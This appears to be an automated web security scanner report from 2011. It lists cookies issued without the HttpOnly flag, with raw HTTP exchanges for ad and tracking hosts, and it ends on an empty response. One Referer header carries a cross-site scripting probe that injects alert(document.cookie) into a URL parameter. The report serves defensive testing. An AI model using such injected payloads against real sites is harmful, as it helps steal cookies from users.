GET /pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EHAAG6ANq0itiBDbz6HJXbIAAboBAfYFgfQAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh
Response
HTTP/1.1 200 OK Connection: close Set-Cookie: d=EBAAG6ANq0itiBDbz6HJXbIAAboBAfcFgZUAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh; expires=Sat, 30-Apr-2011 01:29:45 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Content-Type: image/gif Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 35 Date: Sun, 30 Jan 2011 01:29:45 GMT Server: QS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ewr?cid=20015042&versionid=3 HTTP/1.1 Host: ptsd.eyewonder.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: ew=MDAwMTI5NjMzNTIzMjE4MTAwMDAyMDM3NzFfMTI5NjM1MDQ2MjU2MV8xMV9fXzA; Domain=.eyewonder.com; Expires=Sun, 27-Mar-2011 01:21:02 GMT; Path=/ Set-Cookie: ewroi=""; Domain=.eyewonder.com; Expires=Sun, 27-Mar-2011 01:21:02 GMT; Path=/ P3P: CP="NON DSP COR NID CURa PSAa PSDa OUR STP UNI COM NAV STA LOC OTC", policyref="http://pts.eyewonder.com/static/ew/w3c/p3p_eyewonder.xml" gmtdiid: 8a8486852dd2373f012dd2d1a0311046 Content-Type: text/javascript;charset=US-ASCII Content-Length: 325 Date: Sun, 30 Jan 2011 01:21:02 GMT Connection: close
/* Created On: 1296350462561 */var ew20015042_dynamicAdModel={acid: 0,adid: 200927,eid: 20015042,tid: 0,emv: 4,uid: null,value: ''};document.writeln('<scr'+'ipt language="Javascript" id="ew20015042_wr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 HTTP/1.1 Host: r1-ads.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Location: http://c Cache-Control: private, max-age=0, no-cache Expires: Sun, 30 Jan 2011 18:08:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Date: Sun, 30 Jan 2011 18:08:28 GMT Connection: close Set-Cookie: C2=ckaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/ Set-Cookie: F1=BwRqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/ Set-Cookie: BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/ Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/ Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click Set-Cookie: 6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://c">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 HTTP/1.1 Host: r1-ads.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Location: http://c Cache-Control: private, max-age=0, no-cache Expires: Sun, 30 Jan 2011 18:08:30 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Date: Sun, 30 Jan 2011 18:08:30 GMT Connection: close Set-Cookie: C2=ekaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/ Set-Cookie: F1=B4RqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/ Set-Cookie: BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/ Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/ Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click Set-Cookie: 6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://c">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=izJRNJpwIg02FQFCdbdBUhwUwXAVI8Y4FQFCYTeBUhQ3gZAVIQTnGQFCF2pBUhAohXAVIYZ4FQFCKGeBUhwohXAVIca4FQFCiGeBUhQshXAVwOYAM/oxqI7YCwAoGJ1r1RQcKaEOGK2AI9YxxN53EkL3FkzgPXw6TVQXsumB/0mhqca7HIaWGeQrMew41ZMFkq1B6bjhUq6bDwWZGJ7r4jQsMa4LwaHCW8ohv0I9IsfzFEzsNiQQoaAV; F1=B0OnE1EBAAAABAAAAQAAABA; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuiy4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ROLL=v5Q240Mxxgzq7NHhPfc3j1yoZKJiMdPbC8fCEdd30GSObC6lkwnqVseu4g1vniv3XYjqYjceyxkwf2tMZSArEQlir5SS2/75sJgaoYVesLytCxbvY9DUCszhatMCKKwTxRIWF+0xTPXT252NsY5JKsYLPWTZUUAXm9JaMAw20vf/mP2cRTHaOgTEMLuyHJXb5Jy8EkMSABMBHiu8OMTbFF6Xd8eJ5ajIEo7MWwYYM2j4u/xo2g3M8yNIsgpaMiSPRegy+4TZaJX30vjsTyS3GGK9P94DueQl+0oOsMvcs3UfJHgL6pNMJ9Bbex1jgMttsrIbsgzmOICEVCga7PcFY4BTH+j6pLnQtbzK/VM!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.950192.730461.0XMC Cache-Control: private, max-age=0, no-cache Expires: Sun, 30 Jan 2011 01:29:43 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 593 Date: Sun, 30 Jan 2011 01:29:43 GMT Connection: close Vary: Accept-Encoding Set-Cookie: C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/ Set-Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/ Set-Cookie: BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/ Set-Cookie: ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/ Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: realestate.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:34 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA09 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=3caf83355b934bd3a1c3218117df8e52; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=2B753083113044228D3A08B4704A491E; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:34 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 40767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /OmRedir.aspx HTTP/1.1 Host: realestate.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:42 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA14 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=c7e4694c7e8948a0a852cd53f852c2cd; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=E61C86B6F829406795830566D6BAA5ED; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:42 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 7348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http:// ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article.aspx HTTP/1.1 Host: realestate.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:38 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA09 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=93ed9493a41741609bf76926d6d18474; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=BB4451F20548401188ACB52B32195513; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:38 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 52241
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /slideshow.aspx HTTP/1.1 Host: realestate.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:37 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA15 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=743d5dfc20ea49fc927bbf5e52addae3; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=D11A40DFEBAF4362805A6A47E91AD76D; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:35 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 50044
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: redtape.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:18:21 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=3df9ab73640c1ed44c1858b2a3c651a7; expires=Sat, 25-Jan-2031 02:18:21 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 65847
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The following cookie was issued by the application and does not have the HttpOnly flag set:
IP=173%2E193%2E214%2E243; path=/js
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/counter.asp?site=s18neumedia HTTP/1.1 Host: s18.sitemeter.com Proxy-Connection: keep-alive Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 01:38:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Content-Length: 7248 Content-Type: application/x-javascript Expires: Sun, 30 Jan 2011 01:48:10 GMT Set-Cookie: IP=173%2E193%2E214%2E243; path=/js Cache-control: private
// Copyright (c)2006 Site Meter, Inc. // <![CDATA[ var SiteMeter = { init:function( sCodeName, sServerName, sSecurityCode ) { SiteMeter.CodeName = sCodeName; SiteMeter.ServerName = sServe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b HTTP/1.1 Host: sb.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
